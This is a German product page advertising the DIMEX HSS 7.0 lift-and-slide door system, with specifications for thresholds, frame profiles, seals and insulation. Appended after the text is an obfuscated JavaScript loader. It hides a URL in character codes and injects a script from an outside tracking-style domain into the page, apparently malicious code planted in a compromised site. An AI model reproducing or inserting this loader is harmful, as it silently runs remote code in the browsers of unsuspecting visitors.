• +91 99107 60737

SYSTEM HEBE-SCHIEBE-SYSTEM HSS 7.0

Hebe-Schiebetüren aus Kunststoff eignen sich  besonders fürTerrassen, Balkone und Wintergärten. Ihre komfortablen und energiesparenden Eigenschaften machen sie zu einem Top-Produkt auf dem Markt. Mit dem System DIMEX HEBE-SCHIEBE-SYSTEM HSS 7.0 lasen sich viele Gestaltungskonzepte und Öffnungsarten realisieren – ein beliebtes Produkt bei Bauherren und Architekten.

Somit sind den Gestaltungsmöglichkeiten bei der Elementauslegung keine Grenzen gesetzt:

  • Zwei-, drei – und vierflügelige HSS-Elemente mit festen und beweglichen HSS-Flügelrahmen.
     
  • Konzipiert für höchste Ansprüche im Hinblick auf:
    • Statik und Stabilität,
    • Wärmedämmung,
    • Schallschutz,
    • Fugendichtheit und Schlagregendichtheit,
    • dauerhafte und zuverlässige Funktion
    • und einfache und kostengünstige Montag,
         
  • Mehrkammertechnologie in allen Konstruktionsdetails, sowohl bei HSS-Hauptprofilen als auch bei den HSS-Zusatzprofilen.
      
  • Beste Wärmedämmung und Isothermenverläufe durch thermisch getrennte und optimierte HSS-Bodenschwelle und Zargenverstärkungsprofile.
      
  • Zur Abdichtung der kritischen Konstruktionsdetails, z. B. am HSS-Mittelstoß, werden qualitativ hochwertige EPDM-Dichtkissen eingesetzt.
      
  • Die Abdichtung der DIMEX-HSS-Tür erfolgt umlaufend und am Mittelstoß in drei Dichtebenen.
      
  • Hohe Flexibilität und eine vernünftige Auswahl aus Holz- und Uni-Dekoren in verschiedenen Varianten (ein- oder beidseitig kaschiert) zeichnen das speziell auf das DIMEX-HSS-System abgestimmte Farbkonzept aus.
converted PNM file

Ausgelegt auf besten Wärmeschutz:

  • Beste Wärmedämmung und Isothermenverläufe durch thermisch getrennte Verstärkungs- und Schwellenprofile mit  geschäumten Isolierstegen.
     
  • Mehrkammertechnologie in allen Konstruktionsdetails, sowohl bei den HSS-Hauptprofilen als auch HSS-Zusatzprofilen.
     
  • Zur Abdichtung der kritischen Konstruktionsdetails, z.B. am Mittelstoß, werden qualitativ hochwertige EPDM-Dichtkissen eingesetzt.
     
  • Die Abdichtung der HSS-Tür erfolgt umlaufend und am Mittelstoß in drei Dichtebenen.

HSS-Bodenschwelle:

  • Die HSS-Bodenschwelle verfügt über eine Profilbautiefe von 167 mm und eine innere Ansichtsbreite von 46 mm.
     
  • Die thermisch getrennte Aluminium-Bodenschwelle ist werkseitig mit schaumbestückten Isolierstegen ausgestattet und konstruktiv auf einen optimalen Isothermenverlauf abgestimmt.
     
  • Vier Schraubkanäle gewährleisten eine schnelle Montage und beste Stabilität der Rahmenkonstruktion.
     
  • An der Elementinnenseite wird die HSS-Bodenschwelle mit einem pflegeleichtem, strapazierfähigem und neutralem Trittschutz aus EPDM-hart ausgestattet.

HSS-Zargenprofil 167/60 3K

  • Das HSS-Zargenprofil verfügt über eine Profilbautiefe von 167 mm und einer Ansichtsbreite von 60 mm in 3K-Ausführung.
     
  • In Kombination mit dem thermisch getrennten HSS-Verstärkungsprofil verfügt die DIMEX-Zargenkonstruktion über 5 Profil-Kammern für eine optimale Wärmedämmung.
  • Das thermisch getrennte Aluminium-Verstärkungsprofil ist werkseitig mit schaumbestückten Isolierstegen ausgestattet.
     
  • Vier Schraubkanäle gewährleisten eine schnelle Montage und beste Stabilität der Rahmenkonstruktion.
     
  • Das HSS-Zargenprofil und das HSS-Zargenverstärkungsprofil sind in den Längen 4,5 m, 5,5 m und 6,5 m lieferbar. Somit geringster Verschnitt undpreiswerte Fertigung.
      
  • Das Profilsortiment der DIMEX-Hebeschiebetür HSS 7.0 bietet wahlweise drei unterschiedliche Varianten, zur Verkleidung der sichtbaren Flächen des HSS-Zargenprofils.

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}